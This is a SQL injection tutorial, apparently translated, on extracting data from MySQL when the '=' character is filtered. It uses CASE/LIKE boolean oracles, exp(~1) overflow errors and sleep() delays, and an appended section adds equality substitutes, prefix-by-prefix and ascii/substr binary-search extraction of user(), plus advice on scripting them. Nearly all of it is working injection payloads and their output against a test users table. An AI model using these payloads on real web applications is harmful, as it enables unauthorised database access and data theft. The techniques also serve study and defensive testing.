0x00 Overview

Injection technique for the case where the equals sign ( = ) is not allowed to appear in the input

0x01 Test data

    mysql> select user();
    +----------------+
    | user()         |
    +----------------+
    | root@localhost |
    +----------------+
    1 row in set (0.00 sec)

    mysql> select * from users where id=1;
    +----+----------+----------+
    | id | username | password |
    +----+----------+----------+
    |  1 | Dumb     | Dumb     |
    +----+----------+----------+
    1 row in set (0.00 sec)

0x02 Test

  • Note:
  • If the payload combines LIKE with a time delay (sleep()), the CASE expression sits in the WHERE clause and is evaluated for every row the query scans, so the delay is multiplied by the row count of the table.

  • For example:

  • the users table holds 23 rows

  • the delay is 0.1 s

  • 0.1 s × 23 = 2.3 s, so the query ends up delaying 2.3 s in total. Avoid this construction where possible; the error-based variant below costs no time at all.
    // The correct case
    // The original row comes back and the page stays unchanged
    mysql> select * from users where id=1-(case when (select user()) like 'root%' then 0 else exp(~(1)) end);
    +----+----------+----------+
    | id | username | password |
    +----+----------+----------+
    |  1 | Dumb     | Dumb     |
    +----+----------+----------+
    1 row in set (0.00 sec)

    # Compare the results of id=1-0 and id=1-1 carefully:
    # the CASE branch that yields 0 keeps the original row, anything else changes the page
    mysql> select * from users where id=1-0;
    +----+----------+----------+
    | id | username | password |
    +----+----------+----------+
    |  1 | Dumb     | Dumb     |
    +----+----------+----------+
    1 row in set (0.00 sec)

    mysql> select * from users where id=1-1;
    Empty set (0.00 sec)
    // The wrong case
    // The page throws an error; if error display is turned off, the page returns no data
    // ~(1) is 18446744073709551614 as BIGINT UNSIGNED, and exp() of that overflows DOUBLE, hence ERROR 1690
    mysql> select * from users where id=1-(case when (select user()) like 'soot%' then 1 else exp(~(1)) end);
    ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~(1))'
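The following is an added example, not part of the original page, that generalises both the equals-free test shown above and the delay caveat in the notes. It assumes the page's setup: a MySQL server with a throwaway users table holding row id=1, user() returning root@localhost, and an injection point that lands in the id value of `select * from users where id=<input>`. The table names, the sample string 'root@localhost' and the character offset 6 are illustrative assumptions.

```sql
-- Added example (not the original page's code). Assumes a MySQL users table
-- like the page's and user() = 'root@localhost'. None of the probes below
-- contain the character '='.

-- 1. Equality without '=': every column here evaluates to 1 (true) when both
--    sides are the same string.
select 'root@localhost' like 'root@localhost'                          as via_like,
       'root@localhost' in ('root@localhost')                          as via_in,
       'root@localhost' between 'root@localhost' and 'root@localhost'  as via_between,
       'root@localhost' regexp '^root@localhost$'                      as via_regexp,
       strcmp('root@localhost', 'root@localhost') in (0)               as via_strcmp,
       not ('root@localhost' < 'root@localhost'
            or 'root@localhost' > 'root@localhost')                    as via_lt_gt;

-- 2. The page's oracle, written as a reusable shape:
--    condition true  -> CASE yields 0 -> id=1-0 -> row 1 is returned, page unchanged
--    condition false -> exp(~1) overflows DOUBLE -> ERROR 1690, or an empty page
--                       when error display is off
--    (~1 is 18446744073709551614 as BIGINT UNSIGNED.)
select * from users
 where id=1-(case when (select user()) like 'root@%' then 0 else exp(~1) end);

-- 3. Extract the value one character at a time by growing the known prefix.
--    A LIKE pattern with no trailing '%' matches the whole string, so the last
--    probe confirms that the full value has been recovered.
select * from users
 where id=1-(case when (select user()) like 'root@l%' then 0 else exp(~1) end);
select * from users
 where id=1-(case when (select user()) like 'root@localhost' then 0 else exp(~1) end);

-- 4. Ordering instead of prefix matching: '<' and '>' are allowed, so a binary
--    search over the character set is possible. substr(user(),6,1) is 'l'
--    (ascii 108) in the assumed setup, so 108 > 96 holds and row 1 comes back.
select * from users
 where id=1-(case when ascii(substr((select user()),6,1)) > 96 then 0 else exp(~1) end);

-- 5. The delay caveat from the notes: with sleep() in place of exp(), the CASE
--    is evaluated once per scanned row, so a 0.1 s sleep on a 23-row table
--    costs 2.3 s. Check the multiplier before using a time-based oracle.
select count(*) from users;
select * from users
 where id=1-(case when (select user()) like 'soot%' then 0 else sleep(0.1) end);

-- 6. LIKE pitfalls a practitioner should expect: '_' and '%' are wildcards, and
--    the default *_ci collations ignore case, so the first two comparisons
--    match. Use BINARY for an exact, case-sensitive answer and an ESCAPE
--    clause when a literal '_' or '%' must be matched.
select 'root@localhost' like 'root_localhost'           as underscore_is_wildcard,
       'ROOT@LOCALHOST' like 'root@localhost'           as ci_collation_matches,
       'ROOT@LOCALHOST' like binary 'root@localhost'    as binary_is_exact,
       'root_x' like 'root#_x' escape '#'               as escaped_underscore;
```

Steps 2 and 3 are the ones to script in practice: keep the confirmed prefix, append each candidate character with a trailing `%`, and treat "row 1 returned" as true and "error or empty page" as false. Step 4 is the faster route when the target allows `<` and `>`, since it needs about seven requests per character instead of one per candidate.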